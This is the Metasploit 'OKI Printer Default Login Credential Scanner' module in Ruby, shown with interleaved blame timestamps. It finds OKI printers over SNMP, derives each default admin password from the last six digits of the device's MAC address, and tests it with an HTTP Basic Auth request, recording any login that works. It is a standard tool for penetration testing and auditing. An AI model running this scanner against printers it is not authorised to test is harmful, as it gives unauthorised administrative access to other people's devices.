metasploit-framework/modules/auxiliary/scanner/misc/oki_scanner.rb

114 lines
3.1 KiB
Ruby
Raw Normal View History

2011-12-20 09:09:09 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
2011-12-20 09:09:09 +00:00
##
# TODO: Split this module into two seperate SNMP and HTTP modules.
2011-12-20 09:09:09 +00:00
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'OKI Printer Default Login Credential Scanner',
2011-12-20 09:09:09 +00:00
'Description' => %q{
This module scans for OKI printers via SNMP, then tries to connect to found devices
2012-03-18 05:07:27 +00:00
with vendor default administrator credentials via HTTP authentication. By default, OKI
network printers use the last six digits of the MAC as admin password.
2011-12-20 09:09:09 +00:00
},
'Author' => 'antr6X <anthr6x[at]gmail.com>',
'License' => MSF_LICENSE
))
register_options(
[
OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),
OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])
], self.class)
deregister_options('RPORT', 'VHOST')
end
def cleanup
datastore['RPORT'] = @org_rport
end
def run_host(ip)
@org_rport = datastore['RPORT']
datastore['RPORT'] = datastore['SNMPPORT']
2011-12-20 17:32:33 +00:00
index_page = "index_ad.htm"
auth_req_page = "status_toc_ad.htm"
2011-12-20 09:09:09 +00:00
snmp = connect_snmp()
snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|
2011-12-20 17:32:33 +00:00
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
2011-12-20 09:09:09 +00:00
#check if it is a OKI
#OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
2011-12-20 17:32:33 +00:00
if first_six == "002536" || first_six == "008087" || first_six == "002536"
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
print_status("Found: #{sys_name}")
print_status("Trying credential: admin/#{last_six}")
2011-12-20 09:09:09 +00:00
tcp = Rex::Socket::Tcp.create(
'PeerHost' => rhost,
'PeerPort' => datastore['HTTPPORT'],
'Context' =>
{
'Msf'=>framework,
'MsfExploit'=>self
}
)
2011-12-20 17:32:33 +00:00
auth = Rex::Text.encode_base64("admin:#{last_six}")
http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"
http_data << "Referer: http://#{ip}/#{index_page}\r\n"
http_data << "Authorization: Basic #{auth}\r\n\r\n"
tcp.put(http_data)
2011-12-20 09:09:09 +00:00
data = tcp.recv(12)
2011-12-20 18:19:34 +00:00
response = "#{data[9..11]}"
2011-12-20 09:09:09 +00:00
2011-12-20 18:19:34 +00:00
case response
2011-12-20 09:09:09 +00:00
when "200"
2011-12-20 17:32:33 +00:00
print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")
report_auth_info(
:host => rhost,
:port => datastore['HTTPPORT'],
:proto => "tcp",
:user => 'admin',
:pass => last_six
)
2011-12-20 09:09:09 +00:00
when "401"
2011-12-20 17:32:33 +00:00
print_error("Default credentials failed")
2011-12-20 09:09:09 +00:00
when "404"
2011-12-20 18:19:34 +00:00
print_status("Page not found, try credential manually: admin/#{last_six}")
2011-12-20 09:09:09 +00:00
else
2011-12-20 17:32:33 +00:00
print_status("Unexpected message")
2011-12-20 09:09:09 +00:00
end
disconnect()
end
end
disconnect_snmp()
rescue SNMP::RequestTimeout
print_status("#{ip}, SNMP request timeout.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Unknown error: #{e.class} #{e}")
end
end